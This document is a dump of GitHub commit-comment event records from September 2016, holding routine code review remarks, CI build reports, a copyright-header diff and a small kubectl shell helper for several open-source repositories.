{"id":"4505321380","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":18871197,"position":26,"line":159,"path":"plot_outliers_by_threshold.py","commit_id":"8491f16384f98c4e13ab0eda5a2ce6619822c238","created_at":"2016-09-01T21:44:59Z","updated_at":"2016-09-01T21:44:59Z","body":"Would this be clearer as a lambda? It would keep the function close to the (only) place where it's used. There again, it might make the line too long..."}},"created_at":"2016-09-01T21:44:59Z"}
{"id":"4505323572","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871204,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T21:45:27Z","updated_at":"2016-09-01T21:45:27Z","body":"iteration (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-01T21:45:27Z"}
{"id":"4505323775","type":"CommitCommentEvent","actor":{"login":"tommyettinger"},"repo":{"name":"libgdx/libgdx"},"payload":{"comment":{"id":18871205,"position":null,"line":null,"path":null,"commit_id":"6602a80d39212c935956506823657524f3a3a3da","created_at":"2016-09-01T21:45:29Z","updated_at":"2016-09-01T21:45:29Z","body":"This has a lot of unexpected effects in code that uses distance field fonts and changes a font's scale to keep the distance field fonts crisp (if there's a better way, I'm all ears). Each '@' here is a Label using a distance field font, and this commit introduced a subtle difference in my code between what handles backgrounds and what handles actively-moving Labels (which are scene2d Actors, and that seems to be the important distinction). Here's in libGDX 1.9.3, http://i.imgur.com/KkJHTTm.png , and here's in libGDX 1.9.4, http://i.imgur.com/BYv379m.png . The screenshot using 1.9.3 was in-progress and had a blurriness issue, but updating to 1.9.4 without changing any code makes each '@' much bigger than the cells they are supposed to occupy (blue background is smaller than '@' height, '@' is not squashed to fit a square). Now chars can overlap with each other where they wouldn't before, and they effectively disregard zoom introduced by any source except changing each Label's individual font scale. I'll see if I can remedy this in my code before introducing an issue."}},"created_at":"2016-09-01T21:45:29Z"}
{"id":"4505326946","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":18871208,"position":10,"line":789,"path":"src/gwt/src/org/rstudio/studio/client/workbench/views/source/editors/text/ChunkOutputWidget.java","commit_id":"ef5a5b063a7ae6b2441e1103924ec37ea1d378fe","created_at":"2016-09-01T21:46:11Z","updated_at":"2016-09-01T21:46:11Z","body":"@jmcphers can you double-check that my moving the `syncHeight` call into the timer implementation won't cause unexpected issues? The MathJax resize issue seemed to be a result of us attempting to resize the line widget before the MathJax within was actually populated / rendered.\r\n\r\nThis change basically means that the `onOutputHeightChanged` callback isn't fired until after the expand / collapse animation finishes."}},"created_at":"2016-09-01T21:46:11Z"}
{"id":"4505328799","type":"CommitCommentEvent","actor":{"login":"MikhailArkhipov"},"repo":{"name":"Microsoft/RTVS"},"payload":{"comment":{"id":18871213,"position":35,"line":112,"path":"src/R/Components/Impl/InteractiveWorkflow/Implementation/RInteractiveWorkflow.cs","commit_id":"e52124fac6645fe888e6d45d3dac98f50d8c9420","created_at":"2016-09-01T21:46:34Z","updated_at":"2016-09-01T21:46:34Z","body":"Opened #2243"}},"created_at":"2016-09-01T21:46:34Z"}
{"id":"4505329800","type":"CommitCommentEvent","actor":{"login":"EtchedPixels"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18871217,"position":null,"line":null,"path":null,"commit_id":"9751ad52e7ec6d05575522bca540cc877798f54c","created_at":"2016-09-01T21:46:47Z","updated_at":"2016-09-01T21:46:47Z","body":"try again 8)\r\n"}},"created_at":"2016-09-01T21:46:47Z"}
{"id":"4505330544","type":"CommitCommentEvent","actor":{"login":"devmsh"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18871219,"position":33,"line":33,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-01T21:46:57Z","updated_at":"2016-09-01T21:46:57Z","body":":) طالما رجع فلوس ... معناها ما ضاف ... مش منطقي دالة ترجع فولس وتكون العملية نجحت\r\nبكل بساطة\r\nCart will have 0 items\r\nAfter add Product X, cart will have 1 item with quantity equals to 1\r\nAfter add Product X again, cart will have 1 item with quantity equals to 2\r\nAfter add Product Y, cart will have 2 items, where Product X item quantity = 2, and Product Y item quantity  = 1"}},"created_at":"2016-09-01T21:46:57Z"}
{"id":"4505330935","type":"CommitCommentEvent","actor":{"login":"GregoryLundberg"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18871221,"position":233,"line":530,"path":"src/gui/dialogs/multiplayer/mp_create_game.cpp","commit_id":"725df26dd27f690288027929f2cde510b874464f","created_at":"2016-09-01T21:47:02Z","updated_at":"2016-09-01T21:47:02Z","body":"    /home/lundberg/wesnoth/src/gui/dialogs/multiplayer/mp_create_game.cpp: In member function ‘void gui2::tmp_create_game::update_options_list(gui2::twindow&)’:\r\n    /home/lundberg/wesnoth/src/gui/dialogs/multiplayer/mp_create_game.cpp:529:52: warning: unused parameter ‘window’ [-Wunused-parameter]\r\n     void tmp_create_game::update_options_list(twindow& window)\r\n"}},"created_at":"2016-09-01T21:47:02Z"}
{"id":"4505336578","type":"CommitCommentEvent","actor":{"login":"warnhac"},"repo":{"name":"warnhac/hello-world"},"payload":{"comment":{"id":18871235,"position":4,"line":4,"path":"hello_git","commit_id":"9b6c5639441ae7d95982610c69c167fd395a87cb","created_at":"2016-09-01T21:48:18Z","updated_at":"2016-09-01T21:48:18Z","body":"put another printf statement to thanks git hub "}},"created_at":"2016-09-01T21:48:18Z"}
{"id":"4505338729","type":"CommitCommentEvent","actor":{"login":"Mifie89"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18871240,"position":null,"line":null,"path":null,"commit_id":"a7935cac6ebb6388ee7c7df3ac2ebdb8e849ed77","created_at":"2016-09-01T21:48:44Z","updated_at":"2016-09-01T21:48:44Z","body":"Marv, sorry if you felt that was a personal attack, it wasn't. I was trying to have a discussion on balance, which many servers have suffered for lack of discussion. I did not mean it was bad a bad idea, or that you had done anything wrong. I wanted to talk about how do we make this make sense in the game. I feel it's as much a problem that people cannot discuss without feeling attacked, how do you make progress otherwise? I wasn't upset, I can take or leave this game at anytime as well, it's just a hobby.\r\n\r\nIn that vein, why is there none/can we not have discussion as to how to make this work and build together something that is fun, and balanced that provides reward for risk. I think you've done a great job with your changes so far, and it's a loss to see you abandon helping if you felt you were attacked. So maybe I am just in the minority on wanting to discuss these things, and if that's the case, feel free to commit what you like and I will revisit the style I would like to see possibly later on, or in a different place. "}},"created_at":"2016-09-01T21:48:44Z"}
{"id":"4505339094","type":"CommitCommentEvent","actor":{"login":"nooradeen94"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18871242,"position":33,"line":33,"path":"ShippingTest.php","commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-01T21:48:49Z","updated_at":"2016-09-01T21:48:49Z","body":"الفولس بيرجع فقط في حال كان المنتج موجود , لانو فعليا هوة ما ضاف و لكن فقط زود الكمية "}},"created_at":"2016-09-01T21:48:49Z"}
{"id":"4505341622","type":"CommitCommentEvent","actor":{"login":"abhisnypar"},"repo":{"name":"abhisnypar/PopularMovies"},"payload":{"comment":{"id":18871249,"position":null,"line":null,"path":null,"commit_id":"185396ddc91b6112b69f4570e631cd4c3970f9c6","created_at":"2016-09-01T21:49:20Z","updated_at":"2016-09-01T21:49:20Z","body":"Looks good "}},"created_at":"2016-09-01T21:49:20Z"}
{"id":"4505342150","type":"CommitCommentEvent","actor":{"login":"abhisnypar"},"repo":{"name":"abhisnypar/PopularMovies"},"payload":{"comment":{"id":18871251,"position":null,"line":null,"path":null,"commit_id":"185396ddc91b6112b69f4570e631cd4c3970f9c6","created_at":"2016-09-01T21:49:27Z","updated_at":"2016-09-01T21:49:27Z","body":"Looks good"}},"created_at":"2016-09-01T21:49:27Z"}
{"id":"4505344219","type":"CommitCommentEvent","actor":{"login":"mmpritchard"},"repo":{"name":"mmpritchard/google-homepage"},"payload":{"comment":{"id":18871259,"position":1,"line":1,"path":"README.md","commit_id":"8950085ab0ab2fd03e12ba8697063b4e8786c849","created_at":"2016-09-01T21:49:54Z","updated_at":"2016-09-01T21:49:54Z","body":"https://github.com/mmpritchard.google-homepage.git\r\n"}},"created_at":"2016-09-01T21:49:54Z"}
{"id":"4505344451","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"grosser/dotfiles"},"payload":{"comment":{"id":18871261,"position":null,"line":null,"path":null,"commit_id":"eca07c9c69deccdc19a5bcaf7b46b72f14577711","created_at":"2016-09-01T21:49:57Z","updated_at":"2016-09-01T21:49:57Z","body":"FYI @zendesk/paas this will make your terminal behave ..."}},"created_at":"2016-09-01T21:49:57Z"}
{"id":"4505349934","type":"CommitCommentEvent","actor":{"login":"lobolmart"},"repo":{"name":"emoose/MBINCompiler"},"payload":{"comment":{"id":18871282,"position":11,"line":11,"path":"MBINCompiler/Models/Structs/Unfinished/GcSceneOptions.cs","commit_id":"b2f3d7e4a433ae5ebeb97233fe2c44937393309d","created_at":"2016-09-01T21:51:09Z","updated_at":"2016-09-01T21:51:09Z","body":"i think these 0 bytes after the strings are just \\0 termination: 0x9 + 0x80 = 0x89?\r\ni decide to skip them for uiglobals:\r\nhttps://gist.github.com/lobolmart/d2dfe1d7cb1391d15557fd2dd91be803#file-gcuiglobals_output-cs-L149\r\n"}},"created_at":"2016-09-01T21:51:09Z"}
{"id":"4505352118","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"avigad/logic_and_proof"},"payload":{"comment":{"id":18871287,"position":null,"line":null,"path":null,"commit_id":"e5eb1d4c1d8f0530bba16030a81af97eed655a2a","created_at":"2016-09-01T21:51:38Z","updated_at":"2016-09-01T21:51:38Z","body":"Did you forget to add the new files?"}},"created_at":"2016-09-01T21:51:38Z"}
{"id":"4505352912","type":"CommitCommentEvent","actor":{"login":"MSeneadza"},"repo":{"name":"peterkeen/payola"},"payload":{"comment":{"id":18871288,"position":null,"line":null,"path":null,"commit_id":"a0c6c999d599aa8cc853de839a1d5dcfd9f506e2","created_at":"2016-09-01T21:51:49Z","updated_at":"2016-09-01T21:51:49Z","body":"Thank you for this!"}},"created_at":"2016-09-01T21:51:49Z"}
{"id":"4505354760","type":"CommitCommentEvent","actor":{"login":"zachariasmaladroit"},"repo":{"name":"sonyxperiadev/device-sony-common"},"payload":{"comment":{"id":18871297,"position":null,"line":null,"path":null,"commit_id":"06139bd50e346c553287a454ec90bb2bf0500c00","created_at":"2016-09-01T21:52:16Z","updated_at":"2016-09-01T21:52:16Z","body":"+1"}},"created_at":"2016-09-01T21:52:16Z"}
{"id":"4505356195","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":18871305,"position":null,"line":null,"path":null,"commit_id":"5b8fa3e6cb9e5040c20408aeb8ca47458bf7256b","created_at":"2016-09-01T21:52:34Z","updated_at":"2016-09-01T21:52:34Z","body":"I like it!"}},"created_at":"2016-09-01T21:52:34Z"}
{"id":"4505357806","type":"CommitCommentEvent","actor":{"login":"spwhitton"},"repo":{"name":"jbarlow83/OCRmyPDF"},"payload":{"comment":{"id":18871310,"position":null,"line":null,"path":null,"commit_id":"325cc0beca8f268744779f5aa5e17061626e440f","created_at":"2016-09-01T21:52:55Z","updated_at":"2016-09-01T21:52:55Z","body":"On Wed, Aug 31, 2016 at 05:57:36PM -0700, jbarlow83 wrote:\n> That should work fine. This is really a fix to the test suite in that\n> test_pageinfo.py and test_hocrtransform.py use import ocrmypdf.module and\n> test_main.py did not necessarily locate the same installation if ocrmypdf is\n> installed. By calling Python via sys.executable -m package the same import\n> resolution order as import should be followed so all parts of the test suite\n> are testing whatever Python finds in response to import ocrmypdf - meaning it\n> follows sys.path, the first entry of which is the current working directory.\n> \n> So as written, it will run tests on a new version prior to installation or on\n> the installed version for CI.\n\nOn the Debian CI infrastructure the package gets installed, but then the\nPWD for the tests is the root of the source package (this is because it\nis expected that test scripts/metadata will be located within the source\npackage -- Debian is bad at seperating metadata).  Is there a clean way\nI could remove PWD from sys.path to ensure I'm testing the installed\nversion?\n\n> That said, there could be reasons you might want to explicitly test\n> /usr/[local /]bin/ocrmypdf. I can't think of anything that should be\n> needed other than a basic sanity check:\n> \n> test \"$(ocrmypdf --version)\" == \"$(python3 -m ocrmypdf --version)\"\n\nThat sounds like something worth checking, but as you say, it could just\nbe in a shell script.\n\n> Is there anything beyond that you'd need to check?\n\nI don't think so.  Thanks for your work on this!\n\n-- \nSean Whitton\n"}},"created_at":"2016-09-01T21:52:55Z"}
{"id":"4505366217","type":"CommitCommentEvent","actor":{"login":"treeder"},"repo":{"name":"veggiemonk/awesome-docker"},"payload":{"comment":{"id":18871330,"position":null,"line":null,"path":null,"commit_id":"05a035b74964e47048937f74ffe30512f05086b6","created_at":"2016-09-01T21:54:42Z","updated_at":"2016-09-01T21:54:42Z","body":"You're welcome. :)"}},"created_at":"2016-09-01T21:54:42Z"}
{"id":"4505373563","type":"CommitCommentEvent","actor":{"login":"ximion"},"repo":{"name":"ximion/appstream-generator"},"payload":{"comment":{"id":18871353,"position":11,"line":415,"path":"source/utils.d","commit_id":"b79859426e7ad57f37fbb56297707e6bc9cbc6fa","created_at":"2016-09-01T21:56:19Z","updated_at":"2016-09-01T21:56:19Z","body":"Why do you need that extra scope? The file should close on return, so I don't see a reason why it is needed..."}},"created_at":"2016-09-01T21:56:19Z"}
{"id":"4505373906","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18871356,"position":null,"line":null,"path":null,"commit_id":"439878bebe8c30b5d24907dbb2f2c5c7e985773a","created_at":"2016-09-01T21:56:23Z","updated_at":"2016-09-01T21:56:23Z","body":"The following doc(s) have been deployed to the [1849logs](https://1849logs-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/debug-log-files](https://1849logs-static-docs.pantheonsite.io/docs/debug-log-files)\n- [docs/guides/load-testing-with-blazemeter](https://1849logs-static-docs.pantheonsite.io/docs/guides/load-testing-with-blazemeter)\n- [docs/logs](https://1849logs-static-docs.pantheonsite.io/docs/logs)\n- [docs/php-errors](https://1849logs-static-docs.pantheonsite.io/docs/php-errors)\n- [docs/php-versions](https://1849logs-static-docs.pantheonsite.io/docs/php-versions)\n- [docs/debug-slow-performance](https://1849logs-static-docs.pantheonsite.io/docs/debug-slow-performance)\n- [docs/nginx-access-log](https://1849logs-static-docs.pantheonsite.io/docs/nginx-access-log)\n- [docs/guides/terminus](https://1849logs-static-docs.pantheonsite.io/docs/guides/terminus)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/a3ba81ea73ed94085eeccc6e7ee4a8f108928865/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-01T21:56:23Z"}
{"id":"4505386193","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18871391,"position":null,"line":null,"path":null,"commit_id":"9a1fa73e1ca271cd2b5deeec34f49b38ac37ca1b","created_at":"2016-09-01T21:59:08Z","updated_at":"2016-09-01T21:59:08Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/363/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=gh-pages)."}},"created_at":"2016-09-01T21:59:08Z"}
{"id":"4505389750","type":"CommitCommentEvent","actor":{"login":"gothwski"},"repo":{"name":"makingdevs/MyBarista"},"payload":{"comment":{"id":18871401,"position":null,"line":null,"path":null,"commit_id":"715e1a5e6f9f66fd8bca8c60622193d145e18ac3","created_at":"2016-09-01T21:59:54Z","updated_at":"2016-09-01T21:59:54Z","body":"Recuerden los detalles del issue [#188](https://github.com/makingdevs/MyBarista/issues/188)"}},"created_at":"2016-09-01T21:59:54Z"}
{"id":"4505391594","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18871406,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T22:00:18Z","updated_at":"2016-09-01T22:00:18Z","body":"@zwliew RIL fixed :-) could you please take a look at latest 4 commits and see if can be merged on cm? I' m testing now and it's working really fine , here's a link  of opt/telephony branch too: https://github.com/AOSP-JF-MM/platform_frameworks_opt_telephony/commits/aosp-7.0-test"}},"created_at":"2016-09-01T22:00:18Z"}
{"id":"4505392984","type":"CommitCommentEvent","actor":{"login":"dcommander"},"repo":{"name":"TigerVNC/tigervnc"},"payload":{"comment":{"id":18871408,"position":null,"line":null,"path":null,"commit_id":"7b7ad80a5a973ae87692ca0b431b94625b520ede","created_at":"2016-09-01T22:00:34Z","updated_at":"2016-09-01T22:00:34Z","body":"Minor legal nit-pick:\r\n\r\nAlthough it is definitely nice to include a message stating where the code came from, it is technically incorrect to attribute the copyright to Markus Kuhn, for two reasons:\r\n* He released the code into the public domain, thus relinquishing all of his rights to the code under U.S. copyright law.\r\n* Adding someone's name to an open source copyright header implies that that person released their portion of the code under that specific open source license, or that it was released under a compatible license and was upgraded."}},"created_at":"2016-09-01T22:00:34Z"}
{"id":"4505393789","type":"CommitCommentEvent","actor":{"login":"sivinicius"},"repo":{"name":"sivinicius/sisadail"},"payload":{"comment":{"id":18871409,"position":null,"line":null,"path":null,"commit_id":"7ecc6d5164f4e1e2c2d471472e58fcf51f2a144e","created_at":"2016-09-01T22:00:45Z","updated_at":"2016-09-01T22:00:45Z","body":"Criando Descrição"}},"created_at":"2016-09-01T22:00:45Z"}
{"id":"4505394900","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18871414,"position":null,"line":null,"path":null,"commit_id":"f01ad433d658d690fcb786689c4bd5f3fb6d8cfa","created_at":"2016-09-01T22:01:01Z","updated_at":"2016-09-01T22:01:01Z","body":"Just to mix it up a bit, had this happen just now but it appears to have recovered after 6 rounds of 5x servers busy + response error.\r\n\r\nIt's possible that one endpoint/server is actually busy when this triggers and sometimes it takes a long time for it to come back online (but sometimes not).\r\n\r\nWould it be possible to detect this and re-login or whatever needs to be done to end up with a new endpoint?"}},"created_at":"2016-09-01T22:01:01Z"}
{"id":"4505398724","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871422,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-01T22:01:53Z","updated_at":"2016-09-01T22:01:53Z","body":"develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T22:01:53Z"}
{"id":"4505404652","type":"CommitCommentEvent","actor":{"login":"rapperskull"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":18871437,"position":null,"line":null,"path":null,"commit_id":"ac38b3dff2eef7efd04e1b87ba95b8ec6b7fad72","created_at":"2016-09-01T22:03:15Z","updated_at":"2016-09-01T22:03:15Z","body":"@mfonville Isn't the limit for APK size on the Play Store set at 100MB anyway?"}},"created_at":"2016-09-01T22:03:15Z"}
{"id":"4505405754","type":"CommitCommentEvent","actor":{"login":"MaherJendoubi"},"repo":{"name":"MaherJendoubi/SimplCommerce"},"payload":{"comment":{"id":18871441,"position":null,"line":null,"path":null,"commit_id":"bafa500585b46bcd620bce38aa867332a6fae71c","created_at":"2016-09-01T22:03:28Z","updated_at":"2016-09-01T22:03:28Z","body":"Hi @odetocode,\r\nWhat do you think about this commit please?\r\nI do it after reading your blog post about Keeping a Clean Startup.cs in Asp.Net Core http://odetocode.com/blogs/scott/archive/2016/08/30/keeping-a-clean-startup-cs-in-asp-net-core.aspx\r\n\r\nThanks."}},"created_at":"2016-09-01T22:03:28Z"}
{"id":"4505406924","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18871446,"position":null,"line":null,"path":null,"commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T22:03:43Z","updated_at":"2016-09-01T22:03:43Z","body":"@mikeller I was able to get all parts together, somehow I could not get a rest before, and I can say it does work!!! :smile: \r\nIf added some debug code around, but besides of that its really 100000 _8e1_ (!) via SoftSerial on the native port D3, and on the serial the configurator attached. I've dumped the PPM and it is like this:\r\n\r\n```\r\n21:511,519,960,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\n22:513,519,958,848,1011,530,512,512,512,512,512,512,512,512,512,136,\r\n22:514,518,958,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\n23:513,518,958,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\n21:512,518,958,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\n22:512,517,960,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\nR:2935\r\n22:1011,184,1011,740,136,136,136,136,136,136,136,136,136,136,136,136,\r\n22:1011,184,1011,740,136,136,136,136,136,136,136,136,136,136,136,136,\r\n22:511,517,958,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\n22:1011,184,1011,740,136,136,136,136,136,136,136,136,136,136,136,136,\r\n22:1011,184,1011,740,136,136,136,136,136,136,136,136,136,136,136,136,\r\n22:1011,486,1011,740,136,136,136,136,136,136,136,136,136,136,136,136,\r\n22:1011,486,1011,740,136,136,136,136,136,136,136,136,136,136,136,136,\r\n23:530,516,960,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\n21:542,516,958,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\n22:553,516,960,848,1011,530,512,512,512,512,512,512,512,512,512,136,\r\n23:564,516,960,848,1011,530,512,512,512,512,512,512,512,512,512,136,\r\n22:567,516,958,848,1011,530,512,512,512,512,512,512,512,512,512,136,\r\n22:569,516,958,848,1011,530,512,136,512,512,512,512,512,512,512,136,\r\n````\r\nThats\r\nupdate time: CH1 .. 16\r\nR: = Roundtrips per second\r\n\r\nThis gives 2 answers:\r\n* we have plenty of processing time left with SoftSerial ~2800 Hz\r\n* there is a lot of error while receiving. I hope thats the 8e2 issue. If not this would mean that SS is not precise enough on this high update rates and we need a lower speed...\r\n\r\nCurrently, I dont have a clue how the SS should be adjusted for 8e2, if you have an idea let me know.\r\n\r\nBut anyway, it proves it is definitely possible and it works :smiling_imp: \r\n"}},"created_at":"2016-09-01T22:03:43Z"}
{"id":"4505406974","type":"CommitCommentEvent","actor":{"login":"yuliethargel"},"repo":{"name":"yuliethargel/TENDENCIAS_DISRUPTIVAS"},"payload":{"comment":{"id":18871447,"position":null,"line":null,"path":null,"commit_id":"25c46e1f5f021f107cc0e67df953c3a6ea007669","created_at":"2016-09-01T22:03:43Z","updated_at":"2016-09-01T22:03:43Z","body":"dfdfdfdfdf"}},"created_at":"2016-09-01T22:03:43Z"}
{"id":"4505408451","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18871453,"position":5,"line":4560,"path":"src/libostree/ostree-repo.c","commit_id":"3e0126f2c98938f8fd53ba40346b95653c43e14b","created_at":"2016-09-01T22:04:05Z","updated_at":"2016-09-01T22:04:05Z","body":"No, `_ostree_repo_read_commit_compat_signature` returns `TRUE` on `G_IO_ERROR_NOT_FOUND` (https://github.com/endlessm/ostree/blob/rebase-2016.9-nosquash/src/libostree/ostree-repo-commit.c#L2234). This is similar to how other ostree APIs work (e.g., https://github.com/endlessm/ostree/blob/rebase-2016.9-nosquash/src/libostree/ostree-repo-commit.c#L2145). If `signature` is `NULL`, it just means no signature file was found and there's nothing to do."}},"created_at":"2016-09-01T22:04:05Z"}
{"id":"4505412448","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18871464,"position":31,"line":101,"path":"main/input_default.cpp","commit_id":"5b96c3a5527c1b2989dbfbe625f1c763b8887334","created_at":"2016-09-01T22:04:55Z","updated_at":"2016-09-01T22:04:55Z","body":"It's okay to delete code, really.\r\n![](https://marandarussell.files.wordpress.com/2014/04/0.jpg)"}},"created_at":"2016-09-01T22:04:55Z"}
{"id":"4505413312","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18871466,"position":5,"line":4560,"path":"src/libostree/ostree-repo.c","commit_id":"3e0126f2c98938f8fd53ba40346b95653c43e14b","created_at":"2016-09-01T22:05:08Z","updated_at":"2016-09-01T22:05:08Z","body":"Oh, that makes sense. Forget about it then"}},"created_at":"2016-09-01T22:05:08Z"}
{"id":"4505413876","type":"CommitCommentEvent","actor":{"login":"dbnicholson"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18871469,"position":4,"line":54,"path":"src/ostree/ot-builtin-size-summary.c","commit_id":"085fa129c7852aa7f7bd191164d7d3ede6f014dc","created_at":"2016-09-01T22:05:15Z","updated_at":"2016-09-01T22:05:15Z","body":"Sure."}},"created_at":"2016-09-01T22:05:15Z"}
{"id":"4505415975","type":"CommitCommentEvent","actor":{"login":"dcommander"},"repo":{"name":"TigerVNC/tigervnc"},"payload":{"comment":{"id":18871475,"position":null,"line":null,"path":null,"commit_id":"7b7ad80a5a973ae87692ca0b431b94625b520ede","created_at":"2016-09-01T22:05:42Z","updated_at":"2016-09-01T22:05:42Z","body":"```\r\ndiff --git a/java/com/tigervnc/rfb/UnicodeToKeysym.java b/java/com/tigervnc/rfb/UnicodeToKeysym.java\r\nindex 72b8896..8d7ddd6 100644\r\n--- a/java/com/tigervnc/rfb/UnicodeToKeysym.java\r\n+++ b/java/com/tigervnc/rfb/UnicodeToKeysym.java\r\n@@ -1,6 +1,5 @@\r\n /* Copyright (C) 2002-2005 RealVNC Ltd.  All Rights Reserved.\r\n  * Copyright (C) 2013 Brian P. Hinz\r\n- * Copyright (C) 2001 Markus G. Kuhn, University of Cambridge\r\n  *\r\n  * This is free software; you can redistribute it and/or modify\r\n  * it under the terms of the GNU General Public License as published by\r\n@@ -17,9 +16,12 @@\r\n  * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,\r\n  * USA.\r\n  */\r\n-//\r\n-// Derived from keysym2ucs.c, originally authored by Markus G, Kuhn\r\n-//\r\n+\r\n+/*\r\n+ * Derived from keysym2ucs.c:\r\n+ * Author: Markus G. Kuhn <http://www.cl.cam.ac.uk/~mgk25/>,\r\n+ *         University of Cambridge, April 2001\r\n+ */\r\n \r\n package com.tigervnc.rfb;\r\n```"}},"created_at":"2016-09-01T22:05:42Z"}
{"id":"4505422689","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18871491,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-01T22:07:15Z","updated_at":"2016-09-01T22:07:15Z","body":"develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-01T22:07:15Z"}
{"id":"4505425942","type":"CommitCommentEvent","actor":{"login":"jonmoter"},"repo":{"name":"grosser/dotfiles"},"payload":{"comment":{"id":18871500,"position":null,"line":null,"path":null,"commit_id":"eca07c9c69deccdc19a5bcaf7b46b72f14577711","created_at":"2016-09-01T22:08:01Z","updated_at":"2016-09-01T22:08:01Z","body":"I tend to write functions instead of scripts (for whatever reason), so here's what I added to my .zshrc\r\n\r\n```\r\nfunction kubebash()\r\n{\r\n  [[ $#@ -eq 1 ]] || { echo \"Usage: kubebash <pod_name>\" ; return 1 }\r\n  \r\n  kubectl exec -it $1 -- /bin/bash -c \"stty rows $(tput lines) cols $(tput cols) && export TERM=$TERM && exec bash\"\r\n}\r\n```\r\n"}},"created_at":"2016-09-01T22:08:01Z"}
